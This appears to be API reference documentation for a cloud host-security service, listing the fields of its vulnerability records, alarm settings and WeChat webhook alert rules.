Name | Type | Description |
---|---|---|
Ids | String | IDs of events corresponding to a vulnerability, separated by commas (,) |
Name | String | Vulnerability name |
Status | Integer | 0: pending; 1: ignored; 3: fixed; 5: detecting; 6: fixing; 8: fixing failed |
VulId | Integer | Vulnerability ID |
PublishTime | String | Vulnerability disclosure time |
LastTime | String | Last detection time |
HostCount | Integer | Number of affected hosts |
Level | Integer | Vulnerability level. 1: low-risk; 2: medium-risk; 3: high-risk; 4: critical. |
From | Integer | This field has been deprecated. Note: This field may return null, indicating that no valid values can be obtained. |
Descript | String | Description Note: This field may return null, indicating that no valid values can be obtained. |
PublishTimeWisteria | String | This field has been deprecated. Note: This field may return null, indicating that no valid values can be obtained. |
NameWisteria | String | This field has been deprecated. Note: This field may return null, indicating that no valid values can be obtained. |
DescriptWisteria | String | This field has been deprecated. Note: This field may return null, indicating that no valid values can be obtained. |
StatusStr | String | Event status after aggregation Note: This field may return null, indicating that no valid values can be obtained. |
CveId | String | CVE ID Note: This field may return null, indicating that no valid values can be obtained. |
CvssScore | Float | CVSS score Note: This field may return null, indicating that no valid values can be obtained. |
Labels | String | Vulnerability tags; multiple tags are separated by commas. Note: This field may return null, indicating that no valid values can be obtained. |
FixSwitch | Integer | Whether automatic fixing is supported and hosts that support automatic fixing are included. 0: no; 1: yes. Note: This field may return null, indicating that no valid values can be obtained. |
TaskId | Integer | ID of the last scan task Note: This field may return null, indicating that no valid values can be obtained. |
IsSupportDefense | Integer | Whether defense is supported. 0: not supported; 1: supported. Note: This field may return null, indicating that no valid values can be obtained. |
DefenseAttackCount | Integer | Number of attacks defended Note: This field may return null, indicating that no valid values can be obtained. |
FirstAppearTime | String | First occurrence time Note: This field may return null, indicating that no valid values can be obtained. |
VulCategory | Integer | Vulnerability category. 1: web CMS vulnerability; 2: application vulnerability; 4: Linux software vulnerability; 5: Windows system vulnerability. Note: This field may return null, indicating that no valid values can be obtained. |
AttackLevel | Integer | Attack intensity Note: This field may return null, indicating that no valid values can be obtained. |
FixNoNeedRestart | Boolean | Whether a restart is required after the vulnerability is fixed Note: This field may return null, indicating that no valid values can be obtained. |
Method | Integer | Detection method. 0: version comparison; 1: POC verification. Note: This field may return null, indicating that no valid values can be obtained. |
Number of vulnerability levels
Used by actions: DescribeVulHostTop.
Name | Type | Description |
---|---|---|
VulLevel | Integer | Vulnerability level |
VulCount | Integer | Number of vulnerabilities |
The statistical entity representing the distribution of vulnerabilities by severity level
Used by actions: DescribeVulLevelCount.
Name | Type | Description |
---|---|---|
VulLevel | Integer | Severity level: 1 - low-risk; 2 - medium-risk; 3 - high-risk; 4 - critical |
Count | Integer | Quantity |
Vulnerability overview
Used by actions: DescribeVulOverview.
Name | Type | Description |
---|---|---|
TotalCount | Integer | Total number |
TodayCount | Integer | Number of new key-value pairs today |
Information on the vulnerability database list
Used by actions: DescribeHotVulTop, DescribeVulStoreList.
Name | Type | Description |
---|---|---|
VulId | Integer | Vulnerability ID |
Level | Integer | Vulnerability level |
Name | String | Vulnerability name |
CveId | String | CVE ID |
VulCategory | Integer | 1: web-cms vulnerabilities; 2: application vulnerabilities; 4: Linux software vulnerabilities; 5: Windows system vulnerabilities; 0: emergency vulnerabilities. |
PublishDate | String | Release time |
Method | Integer | Vulnerability Detection Method: 0 - Version Comparison, 1 - POC Verification |
AttackLevel | Integer | Vulnerability attack level |
FixSwitch | Integer | Whether automatic vulnerability fixing is supported 0: not supported on Windows/Linux; 1: supported on Windows/Linux; 2: supported on Linux only; 3: supported on Windows only. |
SupportDefense | Integer | Whether defense against vulnerabilities is supported 0: not supported; 1: supported. |
The statistical entity representing top vulnerabilities
Used by actions: DescribeVulTop.
Name | Type | Description |
---|---|---|
VulName | String | Vulnerability name Note: This field may return null, indicating that no valid values can be obtained. |
VulLevel | Integer | Hazard level: 1-Low-risk; 2-Medium-risk; 3-High-risk; 4-Critical Note: This field may return null, indicating that no valid values can be obtained. |
VulCount | Integer | Number of vulnerabilities Note: This field may return null, indicating that no valid values can be obtained. |
VulId | Integer | Vulnerability ID Note: This field may return null, indicating that no valid values can be obtained. |
List of alarm settings
Used by actions: DescribeWarningList.
Name | Type | Description |
---|---|---|
Type | Integer | Event alarm type. 1: offline; 2: Trojan; 3: abnormal log-in; 4: brute force cracking; 5: vulnerability (including types of values 9, 10, 11, and 12); 6: high-risk command; 7: reverse shell; 8: local privilege escalation; 9: application vulnerability; 10: web CMS vulnerability; 11: emergency vulnerability; 12: security baseline; 13: tampering prevention; 14: malicious request; 15: network attack; 16: Windows system vulnerability; 17: Linux software vulnerability; 18: core file monitoring; 19: client uninstallation; 20: client offline. |
DisablePhoneWarning | Integer | 1: disable alarm; 0: enable alarm |
BeginTime | String | Start time. Format: HH:mm. |
EndTime | String | End time. Format: HH:mm. |
TimeZone | String | Time zone information |
ControlBit | Integer | Vulnerability level control bit (corresponding to the decimal storage in the database) |
ControlBits | String | Vulnerability level control bits in binary. Each bit indicates the enabling status of the corresponding vulnerability level on the page: low, medium, and high (0: disabled; 1: enabled). For example, 101 indicates that both low and high levels are enabled. |
HostRange | Integer | Alarm Host Range Type. 0: All Hosts; 1: By Project; 2: By Tencent Cloud Tag; 3: By Host Security Tag; 4: Custom Hosts Note: This field may return null, indicating that no valid values can be obtained. |
Count | Integer | Configured Number of Hosts in the Range of Alarm, used by the frontend to decide when to display prompt information. Note: This field may return null, indicating that no valid values can be obtained. |
Parameters used to update alarms or inserted into alarms
Used by actions: ModifyWarningSetting.
Name | Type | Required | Description |
---|---|---|---|
Type | Integer | No | Event Alarm Type. 1: Offline; 2: Trojan; 3: Exceptional login; 4: Brute force; 5: Vulnerability (split into four types ranging from 9 to 12); 6: High-risk command; 7: Reverse shell; 8: Local privilege escalation; 9: System component vulnerabilities; 10: Web application vulnerabilities; 11: Emergency vulnerabilities; 12: Security baseline; 14: Malicious request; 15: Network attack; 16: Windows system vulnerabilities; 17: Linux software vulnerabilities |
DisablePhoneWarning | Integer | No | 1: disable alarm; 0: enable alarm. |
BeginTime | String | No | Start time. Format: HH:mm. |
EndTime | String | No | End time. Format: HH:mm. |
ControlBits | String | No | 1. Vulnerability level control bits in binary. Each bit corresponds to the vulnerability level enabling status on the corresponding page. Level: low, medium, high (0: disabled; 1: enabled). Example: 101, indicating both the low and high levels are enabled. 2. Brute force cracking control bits in binary. 01: notify upon successful brute force cracking; 10: notify upon brute force cracking failure. |
HostRange | Integer | No | Alarm Host Range Type. 0: All Hosts; 1: By Project; 2: By Tencent Cloud Tag; 3: By Host Security Tag; 4: Custom Hosts |
Custom passthrough field structure
Used by actions: DescribeWebHookPolicy, ModifyWebHookPolicy.
Name | Type | Required | Description |
---|---|---|---|
Key | String | Yes | key Note: This field may return null, indicating that no valid values can be obtained. |
Value | String | Yes | value Note: This field may return null, indicating that no valid values can be obtained. |
Enterprise WeChat Robot Event Types
Used by actions: DescribeWebHookPolicy, DescribeWebHookRule, DescribeWebHookRules, ModifyWebHookPolicy, ModifyWebHookRule.
Name | Type | Required | Description |
---|---|---|---|
Type | Integer | Yes | Event type |
ControlBit | String | Yes | Event content |
Enterprise WeChat Robot Host Range
Used by actions: DescribeWebHookPolicy, DescribeWebHookRule, DescribeWebHookRules, ModifyWebHookPolicy, ModifyWebHookRule.
Name | Type | Required | Description |
---|---|---|---|
Type | Integer | Yes | Host Range. 1: Project; 2: Tencent Cloud Tag; 3: Host Security Tag; 4: Optional. Empty array means all. |
Values | Array of String | Yes | Host Project or Tag Content |
Policy
Used by actions: DescribeWebHookPolicy.
Name | Type | Description |
---|---|---|
Id | Integer | id Note: This field may return null, indicating that no valid values can be obtained. |
Name | String | Policy name Note: This field may return null, indicating that no valid values can be obtained. |
Events | Array of WebHookEventKv | Event type Note: This field may return null, indicating that no valid values can be obtained. |
HostLabels | Array of WebHookHostLabel | Host range Note: This field may return null, indicating that no valid values can be obtained. |
Receivers | Array of WebHookReceiver | Recipient Note: This field may return null, indicating that no valid values can be obtained. |
Format | Integer | Format. 0: text; 1: JSON. Note: This field may return null, indicating that no valid values can be obtained. |
CustomFields | Array of WebHookCustomField | Custom passthrough field Note: This field may return null, indicating that no valid values can be obtained. |
IsDisabled | Integer | Enable/Disable [1-Disable, 0-Enable] Note: This field may return null, indicating that no valid values can be obtained. |
Quuids | Array of String | Host list Note: This field may return null, indicating that no valid values can be obtained. |
HostCount | Integer | Number of hosts Note: This field may return null, indicating that no valid values can be obtained. |
Alarm recipient
Used by actions: DescribeWebHookPolicy, DescribeWebHookReceiver, DescribeWebHookReceiverUsage, ModifyWebHookPolicy.
Name | Type | Required | Description |
---|---|---|---|
Id | Integer | No | id Note: This field may return null, indicating that no valid values can be obtained. |
Name | String | No | Recipient name Note: This field may return null, indicating that no valid values can be obtained. |
Addr | String | No | Webhook URL Note: This field may return null, indicating that no valid values can be obtained. |
Usage information on associated policies of the alarm recipient
Used by actions: DescribeWebHookReceiverUsage.
Name | Type | Description |
---|---|---|
ReceiverId | Integer | Recipient ID Note: This field may return null, indicating that no valid values can be obtained. |
ReceiverName | String | Recipient name Note: This field may return null, indicating that no valid values can be obtained. |
PolicyName | String | Policy name Note: This field may return null, indicating that no valid values can be obtained. |
Enterprise WeChat Robot Rule Details
Used by actions: DescribeWebHookRule, ModifyWebHookRule.
Name | Type | Required | Description |
---|---|---|---|
RuleName | String | Yes | Rule name |
HookAddr | String | Yes | Chatbot address |
RuleItems | Array of WebHookEventKv | Yes | Event type |
RuleId | Integer | No | Rule ID |
RuleRemark | String | No | Remarks |
HostLabels | Array of WebHookHostLabel | No | Host scope |
HostIds | Array of String | No | Host ID List |
IsDisabled | Integer | No | Whether it is disabled. 1: disabled; 0: enabled |
Enterprise WeChat Robot Rule Summary
Used by actions: DescribeWebHookRules.
Name | Type | Description |
---|---|---|
RuleId | Integer | Rule ID |
RuleName | String | Rule name |
HookAddr | String | Robot Address |
RuleRemark | String | Remarks |
RuleItems | Array of WebHookEventKv | Event type |
HostLabels | Array of WebHookHostLabel | Host range |
IsDisabled | Integer | Enable/Disable [1-Disable, 0-Enable] |
CreateTime | String | Creation time |
UpdateTime | String | Update time |
HostCount | Integer | Number of hosts |
Availability zone information
Used by actions: DescribeBanRegions.
Name | Type | Description |
---|---|---|
ZoneName | String | Availability zone name |